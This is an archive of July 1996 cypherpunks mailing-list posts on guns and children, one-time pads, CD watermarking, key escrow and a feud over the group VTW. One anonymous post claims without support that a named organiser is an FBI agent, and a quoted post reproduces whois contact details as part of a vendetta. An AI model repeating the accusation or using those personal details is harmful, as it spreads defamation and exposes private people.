Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <v02120d0dae18c81ec513@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:55 7/21/96, Igor Chudov @ home wrote:

>As I said, the kid who hit me in the head with a stick was 3-4 years
>younger than me. You skipped that part. Correspondently, I could beat
>him easily (I did, but his mother soon interrupted me), which was
>obvious to him. So he had plenty of information that would deter a
>rational person. He had all the reasons to "to curb his impulse", as
>you said, and he could have thought about his punishment.

Yes, he hit you. But the question relevant to this discussion is: would he
have hit you had you been carrying a firearm, risking not just being beat
up, but death itself? I sincerely doubt it. In fact, one could say that you
were hit *because* you didn't carry a firearm. The truth is, an armed
society is a polite society.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 06:12:13 +0800
To: cypherpunks@toad.com
Subject: Re: A Snake-Oil FAQ
Message-ID: <v02120d11ae197540758e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:05 7/21/96, Simon Spero wrote:

>Really? The only way I know of forcing a one-time pad is to use a hardware
>QM-based random number generator to generate every possible decrypt, thus
>creating a number of universes equal to the number of possible keys. Since
>you can't tell if you're universe is the right one, one should always
>verify the information obtained against a second source. IANAL, so I can't
>say if such a decrypt would count as probably cause.

Now here is a thought. Since there exists a key that allows you to decrypt
any OTP encrypted message to an arbitrary text of the same length as the
original message, an LEO could work backwards from a given text. "Yes, your
honor. We decrypted the suspects communications and discovered the
following confession." Scary thought.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Tue, 23 Jul 1996 03:29:50 +0800
To: WlkngOwl@unix.asb.com>
Subject: Re: Digital Watermarks for copy protection in recent Billboard
Message-ID: <199607221518.LAA23502@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain


> Paged through a recent (June or July 13) edition of Billboard 
> magazine yesterday.  There was an article about the music industry, 
> the internet, and copyright issues.  Didn't have a chance to read in 
> thoroughly, but it mentioned using digital watermarks which contained 
> info on to who (CC number) and when the material was sold... the
> watermarks allgedly could survive if a CD was taped, copied several times
> and redigitized.
> 

Easy enough.

> The anti-piracy scheme is only useful for direct sale to a customer 
> though.  If you buy music anonymously, how is it traced?  This only 
> works for pirating on-demand purchases.

This is probably yet another case of people not thinking ahead.  As 
usual.  People buying CDs at a garage sale & getting arrested for 
piracy.  Wonderful.

> 
> Other issues: what if an eavesdropper steals the music or video? It's 

If they steal it, well, who cares?  If there is something worked out 
so that they could trace STOLEN (not traded or sold) CDs then fine, 
arrest them.  Do you really think though that anyone would waste so 
much time over $8?

> If it uses a credit-card number as (part of) an ID, that's pretty 
> bad.  Someone can sniff for CC numbers if they know how it's stored.

Probably not done that way.  My guess is that the disk ID is assigned 
to the disk at the time of manufacturing.  At the point of purchase 
the customer is forced to give name, address, ID, whatever.  This is 
then stored in a database along with the disc ID (serial num) which 
is prolly printed in the ISBN number or cross referenced with that in 
a national database or something, or just printed right on the disc.  
Anyway, a number is given to you from the CD, and not vice versa, I 
would imagine.

> 
> The system will have to rely on proprietary tech and security through 
> obscurity.  Even know how watermarks are stored without understanding 
> the math, one must be able to somehow garble the sound without 
> distorting it, but which renders the watermark useless.

Actually, this would be quite easy.  The "watermark" would be a 
signal that plays inband, but out of our hearing range during the 
entire CD.  The human ear can only hear in the 20-20,000 (Hz, KHZ?, 
whatever) range.  It would be trivial to add a digital ID signal at, 
say 30,000 or 15 or something like that.  This could then be decoded, 
if need be.  This seems the easiest and most efficient way.  This 
could also be defeated with a lot of $$ (and/or a LOT of HD space).  
If the frequecy is known (it can be found out) it can easily be run 
through recording studio eqipment that can very effectively isolate 
the frequency and cut it out.  If you have a LOT of HDD space 
(digital audio at 2 stereo tracks, not sure of the sampling rate or 
bit resolution, takes about 20MB of HDD space per minute (2 tracks, 
good sampling and bit rate) ) you could probably find the freq. 
fairly easily by isolation and just edit it out, and write the new 
stuff to a CD-R.  If the signal is purely digital, I would imagine 
that it might be even easier that if it were an analog signal (?).  
Someone w/ good equipment (Digital Labs' stuff, or SAW (Software 
Audio Workshop) would be able to do this w/o much problem.  The 
question is is the price/effort worth it?  In quantity maybe.  On an 
individual basis, only if you already happen to have the erquipment.

I have a suspiscion that this type of thing will not really come to 
any kind of fruition due to not only the ability to defeat this, but 
mainly due to things like buying at a garage sale, etc.  If it did, 
only MASS market piraters would be investigated.  (Another example of 
a law creating it's own violators.  Don't make the law, there won't 
be mass piratingof "clean CDs"

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 23 Jul 1996 12:57:48 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape
In-Reply-To: <v03007800ae18d6652564@[192.187.162.15]>
Message-ID: <199607221823.LAA18768@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



DS
>I read Tim May's suggestions, and while he is sincere and trying to be
>helpful, I use strong language above because it's time we called things for
>what they are instead of politely pussyfooting around them. Monkeywrenchers
>are no friends of Cypherpunks. They are the enemy, as surely as is
>mandatory key escrow in the US.

wow, after only about a week DS has suddenly grasped the Tao of 
Cypherpunk and discovered the mysterious and elusive distinction of Those 
That Are and Those That Are Not. I'm really impressed. truly only
a great master could accomplish such a feat in such a short time. 
as long as I have been around here, even I do not have such confidence,
so I bow down to my superior <g>

David suggests that Netscape will be royally screwed if the gov't
cracks down on them because of "monkeywrenchers". but quite the
opposite is possible. as TCM fondly points out, sometimes you win
by losing and lose by winning (not necessarily in those words).

by creating a very large, glaring, and visceral
public spectacle of the government cracking down on crypto, the
resulting outcry could be absolutely enormous and resonate throughout
the entire population. it would be a vivid portrayal of what the
government has been doing quietly and secretly for decades, and
perhaps the public might finally understand what is going on.

before on this list I have advocated that we try to bait the government
into confiscating crypto at a border, or stopping a truck full of
microsoft products with "military grade crypto" at the border or 
something-- filming the customs agents with guns raised and have
a voiceover "what's in the truck? not submachine guns. not missles.
but computer disks. and the government feels they are every bit
as deadly".

p.s. personally I think "monkeywrenching" does have its uses at 
times <g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Tue, 23 Jul 1996 14:46:40 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Giving 6 year old kids Uzi's
In-Reply-To: <199607200649.XAA25479@netcom7.netcom.com>
Message-ID: <199607221825.LAA28544@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> >You might have had a different childhood, but when I (and most of my
> >friends) were 6 (or 12 or even 18), our primary concern was having fun,
>
> When I was in high school (age 14-18), I was on the high school rifle team.
> That means I carried a rifle into school at the beginning of the season
> and back home at the end of the season.  I should not be necessary to
> mention it, but I never shot anyone then, before, or since.

Look.  Let's be very clear about precisely what we're discussing.
We are talking about distributing a gun to every *@#!! kid walking
into school (ok, maybe we make them pay for it, but money ain't the
issue).

We are NOT talking about special training for every child, or giving
them only limited access.

The person to whom I originally responded to on this topic wanted to
give EVERY SINGLE CHILD a gun!

> > Incidentally, if you are interested, I DO have a child (almost 2 yrs),
> > and I certainly would not even contemplate letting him have a gun (no
>
> recommend teaching children about proper use of guns at a similar age,
> with tight supervision.

My point exactly.  YOU JUST DON'T HAND OUT A GUN AND SHOW HIM HOW TO
USE IT AND LET HIM LOOSE!

Now ... we're not talking about children having guns as exceptions; we're
talking about children having guns AS THE RULE.  And I severely object to
the notion that children, as a rule, can be blindly trusted to have good
judgement with deadly force.  (Not just guns, but anything from switch
blades to anti-tank missiles.)

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Tue, 23 Jul 1996 06:24:52 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Responding to Pre-daw
In-Reply-To: <Pine.SV4.3.91.960719224656.17923F-100000@larry.infi.net>
Message-ID: <199607221826.LAA28551@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Worse yet, the bureaucrats, whose asses are on the line when a tragic
> > mistake occurs
>
> which planet are you talking about, Ernest?
>
> Ernie, you figure any FBI folks are going to get disciplined for illegally 
> giving files to the White House?

My mistake.  I should have worded this so that you did not have to
look forward in the article too much to understand that I violently
agree with you.

Please read the original.  I'll dig it up for you (and any other
interested party if you don't have it.)

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Tue, 23 Jul 1996 09:57:24 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <Pine.SOL.3.91.960720082619.6516C-100000@use.usit.net>
Message-ID: <199607221831.LAA28568@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > > Thanks, but if it is all the same to you, I'd rather live
> > > in a country where everybody  << including six year olds >>
> > > carry, and can use Uzi's, etc, as a matter of course.
> > 
> > Would you just hand out guns to all teenagers?
> 
> My twelve-year-old daughter asked for and received a .22 for her birthday.
> Her four and six year old siblings enjoy shooting it, under close 
> supervision.

The question was not whether you might let your little girl operate
a gun.  The question was whether you might let her carry it as part
of her standard equipment.  Would you let her go to school with it
loaded or with ammo within easy reach?  I mean, what's the point of
carrying a gun without bullets?

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Tue, 23 Jul 1996 04:07:11 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Home Made Telephone Voice Changer
Message-ID: <2.2.32.19960722163544.00331a2c@labg30>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Jul 1996, Jerome Tan wrote:

> Does anyone know how to make a home-made telephone voice changer?

Well, if you've got your sound card in your computer, if you download Speak
Freely (from http://www.fourmilab.ch) and simultaneously turn on LPC-10
compression along with simple compression, I've found my voice comes out
more like Robbie the Robot than John Deters.  It's an interesting feature of
the LPC-10 compression that as it removes redundancy from the transmission
that it removes the "human identity" from it as well.  There's got to be a
moral to that story somewhere (especially since the NSA developed the LPC-10
algorithm).

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Tue, 23 Jul 1996 12:52:18 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Kellstrom Calls for DT Funding
In-Reply-To: <ae15bb1717021004f5c9@[205.199.118.202]>
Message-ID: <199607221839.LAA28584@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Too bad these people aren't required to show specific examples where the
> > "bad guys" got away as a result of their failure to be able to do wiretaps.
> 
> I don't think asking for this evidence is a good idea. After all, there
> probably _are_ such examples. It stands to reason.
> 
> But so what? The issue is not whether extensive wiretapping would catch
> certain conspirators and head off certain crimes, the issue is one of how
> liberal and free societies are to operate. Our system has frowned upon such
> Orwellian schemes as mandating that video cameras be placed in all
> residences and in all hotel rooms, regardless of whether certain crimes
> would be detected or deterred.
> 
> The proper argument is not to demand proof of how useful such measures as
> the FBI would like to see are, but, rather, to focus on basic rights
> issues.

I must violently agree.

Having escrowed video cameras in every room in every house will surely
deter violence in the homes as most child and spousal abuse are (no big
surprise) done by family.  But even such horrors as child rape and
beating cannot justify video cameras in every room; not because it is
expensive, but because it is a gross violation of privacy.  (But the
FBI promises it would not use it without a court order, right?  Sure.)

People, in general, understand the severity of "video escrow".  They
just do not understand the severity of "key escrow" yet.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 22 Jul 1996 23:20:48 +0800
To: cypherpunks@toad.com
Subject: SHI_fty
Message-ID: <199607221141.LAA27399@pipe4.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-22-96. NYP, Page One: 
 
   "Microsoft Sees A Major Shift For Computers." John Markoff 
 
      MS is preparing to release new software that would bring 
      the most fundamental change to personal computers since 
      the machines were invented in the 1970's. Demonstrated 
      last week and to be distributed free to the public, the 
      software is designed to blend the multimedia technology 
      of the Web with Windows 95. PCs would treat each parcel 
      of material as a document with all the stand-alone 
      capabilities of a Web page. Each of these documents 
      would have hyperlinks so that the creator of a document 
      could make it available for reading, listening or 
      viewing anywhere on the Web. 
 
      "This is going to make enormous changes possible," said 
      Jesse Berst, editor of Windows Watcher. "It's analogous 
      to the advent of the automobile." "We're moving into a 
      new world; we now have a new metaphor," said John Seely 
      Brown, director of the Xerox Corporation's Palo Alto 
      Research Center. 
 
      A potentially troublesome aspect to Microsoft's new 
      thrust is the extent to which it will further blur the 
      distinctions between data that sit safely on a person's 
      own computer and data flowing around the Internet. While 
      certain measures of privacy and security control are 
      built into Microsoft's current and planned software, it 
      is still working to develop better security for Internet 
      software. 
 
   ----- 
 
   http://jya.com/shifty.txt 
 
   SHI_fty 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 23 Jul 1996 06:23:18 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: VTWW
In-Reply-To: <VsugRD4w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.93.960722114222.916B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jul 1996, Dr.Dimitri Vulis KOTM wrote:
> jfricker@vertexgroup.com (John F. Fricker) writes:
> > Any of you New Yorkers know the Society for Electronic Access (SEA)?
> Yes. Plug-pulling censorous lying motherfuckers.

     Don't sugar coat it Dr, tell us how you really feel.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 23 Jul 1996 03:39:38 +0800
To: ichudov@algebra.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607220111.UAA19079@manifold.algebra.com>
Message-ID: <Pine.SV4.3.91.960722114047.863A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I think it is a bad policy to say, "once I have kids in the house, I 
won't have guns there, period."

Kids do need carefully controlled exposure to firearms and their hazards. 
I refer to the proverbial lesson a father or grandfather gies the young 
laddy - shooting a watermelon or whatnot, so that the kiddy can see that 
water-filled bags of protoplasm, when shot - get the shit blown out of 
them.

No doubt, that guns need to be _positively_ secured in a household where
kids are running around. Many states have laws to that effect. Now, if we
could just get the unwashed masses to keep the sink-drain unclogger fluid,
the radiator-antifreeze fluid, and these various other commobn household
items - just as carefully secured....might reduce the workload on the
nation's poison control centers. 

Without these parent-mediated exposures to firearms safety lessons, the 
only exposure today's kids have to the subject is what they see and hear 
in the public schools and on Hollywood TV/movies.   The worst possible 
messengers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Tue, 23 Jul 1996 09:36:02 +0800
To: "'cypherpunks@toad.com>
Subject: FW: SHI_fty
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960722185009Z-33264@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>At 08:45 AM 7/22/96 EDT, you wrote:
>>jya@pipeline.com (John Young) writes:
>>
>>>    "Microsoft Sees A Major Shift For Computers." John Markoff
>>>
>>>       MS is preparing to release new software that would bring
>>>       the most fundamental change to personal computers since
>>>       the machines were invented in the 1970's.
>>
>>You mean, Microsoft Bob? I saw MS Bob on clearance at the Wiz on 86th st...
>>$15/copy, not moving.
>>
>
>hahaahahaha
>
>Actually they are referring to IE4 aka Detroit technology.
>
>That's all. "Major Shift" cause the browser is an ole container. Not exactly
>earth shattering but that's good PR for ya.
>
>--j
>
The technology is old hat, but the concept is moving. Keep in mind that
this is a series of steps...

>Yep, I work at MS. Isn't it neat?
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 23 Jul 1996 14:17:10 +0800
To: Alex Derbes <acd@artemis.arc.nasa.gov>
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
In-Reply-To: <Pine.SGI.3.91.960722095424.5549D-100000@mother.arc.nasa.gov>
Message-ID: <Pine.LNX.3.93.960722114850.916E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jul 1996, Alex Derbes wrote:
> 	There were no signs of mecahnical faliure, the plane took off one 
> hour late, that means if it was a timed bomb the plane would have gone 
> down over oh lets say random VERY VERY deep place in the atlantic ocean.  
> The plane was an easy shop for all sorts of shoulder launched SAM's.  

     According to the information I have seen, there are no SAM's that can
reach out and touch a plane at 13000 feet. The engagement ceiling on a
most is 8000 to 9000 feet iirc.

> There is a hell of alot of terrorist activity right now, and the 
> olympics, I think there is good circumstantial evidance to suggest 
> terrorist activty just from motives and oppertunity.

     What motives?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 04:03:17 +0800
To: ante <ante@nemesis.meaning.com>
Subject: Re: evidence from the NIC - interpret and use as you will.
In-Reply-To: <199607220153.SAA29047@black.colossus.net>
Message-ID: <199607221558.LAA12338@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



ante writes:
> See who is sleeping with who. These are the supporters of the sham
> "hearings".

Oh, not again.

Look, we know that you are on some stupid vendetta against Matt Blaze
for no observable reason other than likely paranoid delusions. Could
you quit bothering us with it? No one cares.

Perry

> Voters Telecomm Watch (VTW-DOM)
>    115 Pacific St., #3
>    Brooklyn, NY 11201
> 
>    Domain Name: VTW.ORG
> 
>    Administrative Contact:
>       Safdar, Shabbir  (SS155)  shabbir@PANIX.COM
>       (718) 596-7234
>    Technical Contact, Zone Contact:
>       Panix Network Information Center  (PANIX5)  hostmaster@panix.com
>       +1 212 741 4400
> 
>    Record last updated on 27-Sep-95.
>    Record created on 06-May-94.
> 
>    Domain servers in listed order:
> 
>    NS1.ACCESS.NET		198.7.0.1
>    NS2.ACCESS.NET		198.7.0.2
> 
> 
> The InterNIC Registration Services Host contains ONLY Internet Information
> (Networks, ASN's, Domains, and POC's).
> Please use the whois server at nic.ddn.mil for MILNET Information.
> 
> Blaze, Matt (CRYPTO-DOM)
>    101 Crawford Corners Rd
>    Room 4G-634
>    Holmdel, NJ 07733
> 
>    Domain Name: CRYPTO.COM
> 
>    Administrative Contact:
>       Blaze, Matt  (MB19)  mab@CRYPTO.COM
>       (908) 949-8069
>    Technical Contact, Zone Contact:
>       Network Information and Support Center  (PSI-NISC)  hostinfo@psi.com
>       (518) 283-8860
> 
>    Record last updated on 06-May-93.
>    Record created on 06-May-93.
> 
>    Domain servers in listed order:
> 
>    NS.PSI.NET			192.33.4.10
>    NS2.PSI.NET			38.8.50.2
> 
> 
> The InterNIC Registration Services Host contains ONLY Internet Information
> (Networks, ASN's, Domains, and POC's).
> Please use the whois server at nic.ddn.mil for MILNET Information.
> 
> Center for Democracy and Technology (CDT2-DOM)
>    1634 Eye Street, NW  Suite 1100
>    Washington, DC 20006
>    USA
> 
>    Domain Name: CDT.ORG
> 
>    Administrative Contact:
>       Weitzner, Daniel  (DW151)  djw@CDT.ORG
>       (202) 637-9800
>    Technical Contact, Zone Contact:
>       Palacios, Bob  (BP282)  bobpal@CDT.ORG
>       (202) 637-9800
>    Billing Contact:
>       Kolb, Danielle  (DK1006)  dkolb@CDT.ORG
>       (202) 637-9800
> 
>    Record last updated on 19-Apr-96.
>    Record created on 20-Dec-94.
> 
>    Domain servers in listed order:
> 
>    NS.CAIS.COM			205.177.10.10
>    NS2.CAIS.COM			199.0.216.1
> 
> 
> The InterNIC Registration Services Host contains ONLY Internet Information
> (Networks, ASN's, Domains, and POC's).
> Please use the whois server at nic.ddn.mil for MILNET Information.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Tue, 23 Jul 1996 10:54:03 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Giving 6 year old kids Uzi's (Was: Responding to Pre-dawn Unannounced Ninja Raids)
In-Reply-To: <Pine.LNX.3.93.960721114117.2945F-100000@smoke.suba.com>
Message-ID: <199607221901.MAA28609@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Incidentally, if you are interested, I DO have a child (almost 2 yrs),
> > and I certainly would not even contemplate letting him have a gun (no
> > matter how well he can use it) until he can legal get one himself.  I
> > will certainly invoke serious wrath (on him and anyone else involved)
> > if I ever found him with a gun.
> 
>      Yes, those guns are evil things. Evil I tell you, constantly shooting
> people for no reason, going off half-cocked and whooping it up all by 
> their polished oiled ol selves.

Hmm.  Sarcasm?  Cannot definitively say, but I'll guess it is.

>      Isn't it funny how otherwise rational people can ascribe intentions
> and moral alignement (ie. good/evil) to an inert chunk of steel?

Assuming you are accusing me of such, you should probably point out
specifically where I said such a thing.  (If I did, it would be bad
grammar or some such, and I would certainly retract it.)

>      He also taught me the basics of gun saftey, and made sure that
> I took those classes that were available to me in the areas of gun 
> saftey and marksmanship.

You might be missing the mark too, but I thought the subject was
giving a gun to every child who enters school, not YOURs or SOME
EXPERT 6 YEAR OLD's special case.

Yes, if every child was truly an exemplary God-fearing Christian,
I would probably have fewer objections to giving every child a
gun.  After all, they would NEVER use it in a fit of rage or
jealousy or any such sins ...  Right?

Death is permanent.  A child is prone to accidents.  Maybe those
of you who are just too "special" and "talented" don't need such
paternalistic frameworks, but I know my child cannot tell right
from wrong, good from bad.  He will get better over time.  But I
don't want another child to pay for my son's less than full
maturity by getting shot.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 23 Jul 1996 04:14:49 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Boycotts and Etiquette
In-Reply-To: <ae18344f000210049773@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960722120010.863E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


My own decision to not interlocute with Sternlight is premised as 
follows:  His viewpoint is invariant and, by now, efficiently disseminated.
Briefly, he is a Statist and he never heard of any degree of Statism that 
offends his sensibilities.  I understand he's old enough to have been 
around when Stalin was still running things in the USSR.  David probably 
was finding good things to say about Old Joe.  And more importantly, 
about J Edgar Hoover.

I pay by the minute for my internet access; many others do as well. If I 
decide to ignore Sternlight, it is a business decision, not a moral one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 23 Jul 1996 08:28:40 +0800
To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v03007602ae19799867d7@[204.179.128.64]>
Message-ID: <Pine.LNX.3.93.960722120323.916H-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jul 1996, Vinnie Moscaritolo wrote:

> >   You pop a claymore in a building with any substance up to the level of
> >concrete re-enforced, and you _will_ be going with them.
> 
> booby traping your home is a really stupid idea, I promise that your
> dog/child/spouse will be theone to accidentally set it off. besides for
> this you can get sued..

     I wasn't condoning boobytrapping, I was arguing that a claymore is 
a bit on the explosive side for use in a house (the thing has about a 
pound of C-4 and a whole bunch of steel ball bearings in it, 95% mortality
out to about 50 meters IIRC. 

> every hear the one about the case of a guy who constantly had his radar
> detector stolen out his his car, he decides to set a trap and rigs his next
> one with exposive. The perp steals the box, sells it. someclown powers it
> up on his dash board and BANG!.. well you'd figure justice is served, but
> the NYC judges awarded the mass of flesh damages and charged the guy with
> manslaughter.

      There are other stories where the perp gets it _in_the_act_ and still
gets awarded damages. Fucking country is going to the dogs and there ain't 
nowhere else to go.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 03:53:15 +0800
To: cypherpunks@toad.com
Subject: Re: the VTW---FBI Connection
In-Reply-To: <199607220251.UAA02057@zifi.genetics.utah.edu>
Message-ID: <199607221607.MAA12381@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> We have received information that VTW is run and supported by the FBI,
> which we have suspected for reasons listed here.

You are out of your mind.

> I) They appear to have no financial support or funding source. They
> do not accept donations. They have no corporate funds. And yet they
> appear to be a thriving business.

They aren't a "thriving business". "They" are Shabbir and some
volunteers. No one works on it full time. "They" don't need any
money. Alexis Rosen at Panix donates their web space.

> II) They are secretive about their location, and do not seem to have
> a headquarters. The address listed in the NIC is a vacant lot in of
> all places Brooklyn, NY.

Vacant my ass. It should take you one guess to figure out what the
address actually is.

> III) On a tip from a "friend" we learned that the power leader behind VTW
> is a cleancut man with the unusual name "Shabbir M. Safdar." Not exactly
> a common name. Several people say they've met him. Our "friend" says
> that Mr. Safdar is in reality an agent of the FBI.

Mr. Safdar is a computer programmer in New York.

> IIII) We didn't believe this without external verification. So we called
> the Brooklyn office of the FBI and asked for Agent Safdar. No such person.
> I called the Washington office. No such person. Checked if there is
> any agent named Safdar. They don't give out this info.

> No driver's license in NY, DC, NJ, etc.

Shabbir doesn't drive. Most people who live in New York City don't.

I've known of him for years before he did VTW. You're on drugs.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 23 Jul 1996 04:15:51 +0800
To: "Paul S. Penrod" <cypherpunks@toad.com
Subject: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.3.89.9607201302.A9726-0100000@netcom>
Message-ID: <9607221607.AA00659@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Limbaugh is giving up the show because it is run in syndication. 
>Syndication is not a profitable format with the ensuing satellite blitz 
>on the horizon. 


I find your argument only moderately less convincing than the average
political campaign ad.

Given Limbaugh's propensity for telling blatant fibs I don't credit anything
he says as being likely to bear any relation to the truth, particularly
when it would mean admitting failure and retreat.

Syndication is highly profitable for many, if its profitable to syndicate
drama with its astronomic production costs it is profitable to syndicate
Rush with his astronomic weight. 

>Limbaugh is a buisnessman and a commentator. He earns a living. He will 
>do what is necessary to leverage his marketability to make the most money.

>Since you've gone to college, I'll have to explain it to you: It's called 
>capitalism - look into it...

Its called failure and spin control. Rush has not announced a new TV show,
he has closed his only TV show. He has closed after his audience declined
and his contracts expired. That is the business decision of the local
stations who don;t see Rush as profitable business anymore and advertisers
who don't want to see their products associated with appologists for
the Oaklahoma bomb.


>You fail to acknowledge the simple fact that a segment of society that 
>feels not only disenfranchised, but that the system is irrepairable will 
>stoop to whatever means they feel is necessary to make their point. They 
>don't care what other people think - just what they believe in. 
>Discrediting is a non issue.

I know that facism has an appeal for many people but that does not mean
that they are not a minority. And I am not using the words Facism as a
casual insult but as an accurate description of a movement which is in
large part a vehicle for racism and has already caused 200 plus murders
at OKC. 

Every time an extreeme idological faction of the left or the right gains
power there are splinter groups from that side claiming that the failure
of the policies is due to them not being compromised and insufficiently 
ideal. Since right wing idealogues have been dominant in the US for some 
time it is the right wing extreemists who are to the fore.


		Phill










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Mon, 22 Jul 1996 21:20:56 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: <rant> Re: Devil's Bargain
In-Reply-To: <Pine.LNX.3.93.960721220053.130P-100000@smoke.suba.com>
Message-ID: <31F35341.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> 

>      Am I the only one in this country who, when hearing about TWA f800
> shrugged his shoulders and thought (or said) "Time flies and aeroplanes
> crash" (Name the band and album and I'll be impressed)?

Subhumans of course.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 23 Jul 1996 03:48:22 +0800
To: vinnie@webstuff.apple.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v03007601ae16cf3358f3@[204.179.131.57]>
Message-ID: <9607221613.AA00685@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



> On 19 Jul 1996 19:51:39 Hallam-Baker wrote

